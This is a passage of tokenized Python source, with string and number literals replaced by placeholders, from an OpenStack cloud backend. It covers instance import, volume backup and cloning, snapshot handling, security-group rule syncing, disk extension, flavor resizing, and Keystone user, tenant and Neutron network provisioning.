<EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def import_instance ( self , membership , instance_id , template_id = None ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except cinder_exceptions . ClientException as e : <EOL> logger . 
exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_instance = nova . servers . get ( instance_id ) <EOL> except nova_exceptions . NotFound : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> return <EOL> with transaction . atomic ( ) : <EOL> try : <EOL> system_volume , data_volume = self . _get_instance_volumes ( nova , cinder , instance_id ) <EOL> if template_id : <EOL> try : <EOL> template = models . Template . objects . get ( uuid = template_id ) <EOL> except models . Template . DoesNotExist : <EOL> logger . exception ( '<STR_LIT>' , template_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> template = self . _get_instance_template ( system_volume , membership , instance_id ) <EOL> cores , ram , flavor_name = self . _get_flavor_info ( nova , backend_instance ) <EOL> state = self . _get_instance_state ( backend_instance ) <EOL> except LookupError as e : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_security_groups = [ ] <EOL> for sg in backend_instance . security_groups : <EOL> try : <EOL> nc_security_groups . append ( <EOL> models . SecurityGroup . objects . get ( name = sg [ '<STR_LIT:name>' ] , cloud_project_membership = membership ) ) <EOL> except models . SecurityGroup . DoesNotExist as e : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_instance = models . Instance ( <EOL> name = backend_instance . name or '<STR_LIT>' , <EOL> template = template , <EOL> agreed_sla = template . sla_level , <EOL> flavor_name = flavor_name , <EOL> cores = cores , <EOL> ram = ram , <EOL> key_name = backend_instance . key_name or '<STR_LIT>' , <EOL> system_volume_id = system_volume . id , <EOL> system_volume_size = self . get_core_disk_size ( system_volume . size ) , <EOL> data_volume_id = data_volume . id , <EOL> data_volume_size = self . get_core_disk_size ( data_volume . 
size ) , <EOL> state = state , <EOL> start_time = self . _get_instance_start_time ( backend_instance ) , <EOL> cloud_project_membership = membership , <EOL> backend_id = backend_instance . id , <EOL> ) <EOL> ips = self . _get_instance_ips ( backend_instance ) <EOL> if '<STR_LIT>' in ips : <EOL> nc_instance . internal_ips = ips [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ips : <EOL> nc_instance . external_ips = ips [ '<STR_LIT>' ] <EOL> nc_instance . save ( ) <EOL> for nc_sg in nc_security_groups : <EOL> models . InstanceSecurityGroup . objects . create ( <EOL> instance = nc_instance , <EOL> security_group = nc_sg , <EOL> ) <EOL> event_logger . instance_import . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance_id } ) <EOL> logger . info ( '<STR_LIT>' , nc_instance . uuid ) <EOL> return nc_instance <EOL> def backup_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> backups = [ ] <EOL> attached_volumes = self . get_attached_volumes ( instance . backend_id , nova ) <EOL> for volume in attached_volumes : <EOL> snapshot = self . create_snapshot ( volume . id , cinder ) . id <EOL> temporary_volume = self . create_volume_from_snapshot ( snapshot , cinder ) <EOL> backup = self . create_volume_backup ( temporary_volume , volume . device , cinder ) <EOL> backups . append ( backup ) <EOL> self . delete_volume ( temporary_volume , cinder ) <EOL> self . delete_snapshot ( snapshot , cinder ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . 
reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> return backups <EOL> def clone_volumes ( self , membership , volume_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> cloned_volume_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot . id , cinder , prefix = prefix ) <EOL> cloned_volume_ids . append ( promoted_volume_id ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> self . delete_snapshot ( snapshot . id , cinder ) <EOL> if not self . _wait_for_snapshot_deletion ( snapshot . id , cinder ) : <EOL> logger . exception ( '<STR_LIT>' , snapshot . id ) <EOL> raise CloudBackendInternalError ( ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> return cloned_volume_ids <EOL> def create_snapshots ( self , membership , volume_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . 
create_cinder_client ( session ) <EOL> snapshot_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> snapshot_ids . append ( snapshot . id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> return snapshot_ids <EOL> def promote_snapshots_to_volumes ( self , membership , snapshot_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> promoted_volume_ids = [ ] <EOL> for snapshot_id in snapshot_ids : <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot_id , cinder , prefix = prefix ) <EOL> promoted_volume_ids . append ( promoted_volume_id ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( promoted_volume_ids ) ) <EOL> return promoted_volume_ids <EOL> def delete_volumes ( self , membership , volume_ids ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . 
join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> for volume_id in volume_ids : <EOL> size = cinder . volumes . get ( volume_id ) . size <EOL> self . delete_volume ( volume_id , cinder ) <EOL> if self . _wait_for_volume_deletion ( volume_id , cinder ) : <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( size ) ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> def delete_snapshots ( self , membership , snapshot_ids ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> for snapshot_id in snapshot_ids : <EOL> size = cinder . volume_snapshots . get ( snapshot_id ) . size <EOL> self . delete_snapshot ( snapshot_id , cinder ) <EOL> if self . _wait_for_snapshot_deletion ( snapshot_id , cinder ) : <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( size ) ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . 
join ( snapshot_ids ) ) <EOL> def push_instance_security_groups ( self , instance ) : <EOL> SecurityGroup = instance . security_groups . model . security_group . get_queryset ( ) . model <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> server_id = instance . backend_id <EOL> backend_groups = nova . servers . list_security_group ( server_id ) <EOL> backend_ids = set ( g . id for g in backend_groups ) <EOL> nc_ids = set ( <EOL> SecurityGroup . objects <EOL> . filter ( instance_groups__instance__backend_id = server_id ) <EOL> . exclude ( backend_id = '<STR_LIT>' ) <EOL> . values_list ( '<STR_LIT>' , flat = True ) <EOL> ) <EOL> for group_id in backend_ids - nc_ids : <EOL> try : <EOL> nova . servers . remove_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> for group_id in nc_ids - backend_ids : <EOL> try : <EOL> nova . servers . add_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def extend_disk ( self , instance ) : <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> server_id = instance . backend_id <EOL> volume = cinder . volumes . get ( instance . data_volume_id ) <EOL> new_core_size = instance . 
data_volume_size <EOL> old_core_size = self . get_core_disk_size ( volume . size ) <EOL> new_backend_size = self . get_backend_disk_size ( new_core_size ) <EOL> new_core_size_gib = int ( round ( new_core_size / <NUM_LIT> ) ) <EOL> if old_core_size == new_core_size : <EOL> logger . info ( '<STR_LIT>' , <EOL> volume . id , new_core_size ) <EOL> return <EOL> elif old_core_size > new_core_size : <EOL> logger . warning ( '<STR_LIT>' , <EOL> volume . id , new_core_size , old_core_size ) <EOL> event_logger . instance_volume . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } <EOL> ) <EOL> return <EOL> self . _detach_volume ( nova , cinder , server_id , volume . id , instance . uuid ) <EOL> try : <EOL> self . _extend_volume ( cinder , volume , new_backend_size ) <EOL> storage_delta = new_core_size - old_core_size <EOL> membership . add_quota_usage ( '<STR_LIT>' , storage_delta ) <EOL> except cinder_exceptions . OverLimit : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> event_logger . instance_volume . error ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } , <EOL> ) <EOL> instance . data_volume_size = old_core_size <EOL> instance . save ( ) <EOL> raise <EOL> finally : <EOL> self . _attach_volume ( nova , cinder , server_id , volume . id , instance . uuid ) <EOL> except cinder_exceptions . OverLimit : <EOL> pass <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_volume . 
info ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : new_core_size_gib } , <EOL> ) <EOL> def update_flavor ( self , instance , flavor ) : <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> server_id = instance . backend_id <EOL> flavor_id = flavor . backend_id <EOL> nova . servers . resize ( server_id , flavor_id , '<STR_LIT>' ) <EOL> if not self . _wait_for_instance_status ( server_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' % instance . uuid , <EOL> ) <EOL> nova . servers . confirm_resize ( server_id ) <EOL> if not self . _wait_for_instance_status ( server_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' % instance . uuid , <EOL> ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_flavor . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } <EOL> ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except CloudBackendError : <EOL> event_logger . instance_flavor . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } <EOL> ) <EOL> raise <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_flavor . 
info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } , <EOL> ) <EOL> def get_nova_usage ( self , membership , start_date , end_date ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> usage = nova . usage . get ( tenant_id = membership . tenant_id , start = start_date , end = end_date ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . error ( '<STR_LIT>' , membership . pk ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> return { <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : getattr ( usage , '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , <NUM_LIT:0> ) / <NUM_LIT> , <EOL> '<STR_LIT>' : len ( getattr ( usage , "<STR_LIT>" , [ ] ) ) , <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , [ ] ) , <EOL> } <EOL> def update_tenant_name ( self , membership , keystone ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> if membership . tenant_id : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> keystone . tenants . update ( membership . tenant_id , name = tenant_name ) <EOL> logger . info ( "<STR_LIT>" , <EOL> membership . tenant_id , tenant_name ) <EOL> except keystone_exceptions . NotFound as e : <EOL> logger . warning ( '<STR_LIT>' , membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , <EOL> membership ) <EOL> def get_floating_ips ( self , tenant_id , neutron ) : <EOL> return neutron . list_floatingips ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> def push_security_group_rules ( self , security_group , nova ) : <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = { <EOL> rule [ '<STR_LIT:id>' ] : self . 
_normalize_security_group_rule ( rule ) <EOL> for rule in backend_security_group . rules <EOL> } <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rule_ids = backend_rules . keys ( ) <EOL> for nc_rule in security_group . rules . all ( ) : <EOL> if nc_rule . backend_id not in backend_rules : <EOL> nonexistent_rules . append ( nc_rule ) <EOL> else : <EOL> backend_rule = backend_rules [ nc_rule . backend_id ] <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( nc_rule ) <EOL> extra_rule_ids . remove ( nc_rule . backend_id ) <EOL> for backend_rule_id in extra_rule_ids : <EOL> logger . debug ( '<STR_LIT>' , backend_rule_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( backend_rule_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> backend_rule_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_rule_id ) <EOL> for nc_rule in unsynchronized_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . backend_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( nc_rule . backend_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule . backend_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_rule . backend_id ) <EOL> for nc_rule in unsynchronized_rules + nonexistent_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . id ) <EOL> try : <EOL> if nc_rule . protocol == '<STR_LIT>' : <EOL> nc_rule_protocol = None <EOL> else : <EOL> nc_rule_protocol = nc_rule . protocol <EOL> nova . security_group_rules . create ( <EOL> parent_group_id = security_group . backend_id , <EOL> ip_protocol = nc_rule_protocol , <EOL> from_port = nc_rule . from_port , <EOL> to_port = nc_rule . to_port , <EOL> cidr = nc_rule . cidr , <EOL> ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . 
exception ( '<STR_LIT>' , <EOL> nc_rule , security_group ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_rule . id ) <EOL> def pull_security_group_rules ( self , security_group , nova ) : <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = [ <EOL> self . _normalize_security_group_rule ( r ) <EOL> for r in backend_security_group . rules <EOL> ] <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rules = security_group . rules . exclude ( backend_id__in = [ r [ '<STR_LIT:id>' ] for r in backend_rules ] ) <EOL> with transaction . atomic ( ) : <EOL> for backend_rule in backend_rules : <EOL> try : <EOL> nc_rule = security_group . rules . get ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( backend_rule ) <EOL> except security_group . rules . model . DoesNotExist : <EOL> nonexistent_rules . append ( backend_rule ) <EOL> extra_rules . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_rule in unsynchronized_rules : <EOL> security_group . rules . filter ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) . update ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for backend_rule in nonexistent_rules : <EOL> rule = security_group . rules . create ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> backend_id = backend_rule [ '<STR_LIT:id>' ] , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , rule . 
id ) <EOL> def get_or_create_user ( self , membership , keystone ) : <EOL> User = get_user_model ( ) <EOL> if membership . username : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . create_session ( membership = membership , check_tenant = False ) <EOL> logger . info ( '<STR_LIT>' , membership . username ) <EOL> return membership . username , membership . password <EOL> except keystone_exceptions . AuthorizationFailure : <EOL> logger . info ( '<STR_LIT>' , membership . username ) <EOL> username = membership . username <EOL> else : <EOL> username = '<STR_LIT>' . format ( <EOL> self . _get_project_ascii_name ( membership . project ) , <EOL> User . objects . make_random_password ( ) , <EOL> ) [ : self . MAX_USERNAME_LENGTH ] <EOL> password = User . objects . make_random_password ( ) <EOL> logger . info ( '<STR_LIT>' , username ) <EOL> keystone . users . create ( <EOL> name = username , <EOL> password = password , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , username ) <EOL> return username , password <EOL> def get_or_create_tenant ( self , membership , keystone ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> if membership . tenant_id : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> return keystone . tenants . get ( membership . tenant_id ) <EOL> except keystone_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , membership . tenant_id ) <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> try : <EOL> return keystone . tenants . create ( <EOL> tenant_name = tenant_name , <EOL> description = membership . project . description , <EOL> ) <EOL> except keystone_exceptions . Conflict : <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> return keystone . tenants . find ( name = tenant_name ) <EOL> def ensure_user_is_tenant_admin ( self , username , tenant , keystone ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> username , tenant . 
name ) <EOL> logger . debug ( '<STR_LIT>' , username ) <EOL> admin_user = keystone . users . find ( name = username ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> try : <EOL> keystone . roles . add_user_role ( <EOL> user = admin_user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . id , <EOL> ) <EOL> except keystone_exceptions . Conflict : <EOL> logger . info ( '<STR_LIT>' , <EOL> username , tenant . name ) <EOL> def get_or_create_internal_network ( self , membership , neutron ) : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> if membership . internal_network_id : <EOL> try : <EOL> response = neutron . show_network ( membership . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . internal_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , membership . internal_network_id ) <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id ) <EOL> return membership . internal_network_id <EOL> network_name = self . get_tenant_internal_network_name ( membership ) <EOL> networks = neutron . list_networks ( name = network_name ) [ '<STR_LIT>' ] <EOL> if networks : <EOL> network = networks [ <NUM_LIT:0> ] <EOL> membership . internal_network_id = network [ '<STR_LIT:id>' ] <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , network_name , membership . tenant_id ) <EOL> subnet_id = network [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id ) <EOL> else : <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : membership . 
tenant_id , <EOL> } <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> membership . internal_network_id = network_id <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , network_name , membership . tenant_id ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : membership . internal_network_id , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> self . get_or_create_router ( neutron , network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> membership . tenant_id ) <EOL> return membership . internal_network_id <EOL> def connect_membership_to_external_network ( self , membership , external_network_id , neutron ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> response = neutron . show_network ( external_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , external_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id , <EOL> external = True , network_id = response [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> membership . external_network_id = external_network_id <EOL> membership . save ( ) <EOL> logger . 
info ( '<STR_LIT>' , <EOL> external_network_id , membership . tenant_id ) <EOL> return external_network_id <EOL> def get_or_create_external_network ( self , membership , neutron , network_ip , network_prefix , <EOL> vlan_id = None , vxlan_id = None , ips_count = None ) : <EOL> if membership . external_network_id : <EOL> self . connect_membership_to_external_network ( membership , membership . external_network_id , neutron ) <EOL> network_name = '<STR_LIT>' . format ( self . create_backend_name ( ) ) <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if vlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vlan_id <EOL> elif vxlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vxlan_id <EOL> else : <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> logger . info ( '<STR_LIT>' , network_name ) <EOL> membership . external_network_id = network_id <EOL> membership . save ( ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> cidr = '<STR_LIT>' . format ( network_ip , network_prefix ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : membership . external_network_id , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : cidr , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> self . get_or_create_router ( neutron , network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> membership . tenant_id ) <EOL> floating_ip = { <EOL> '<STR_LIT>' : membership . 
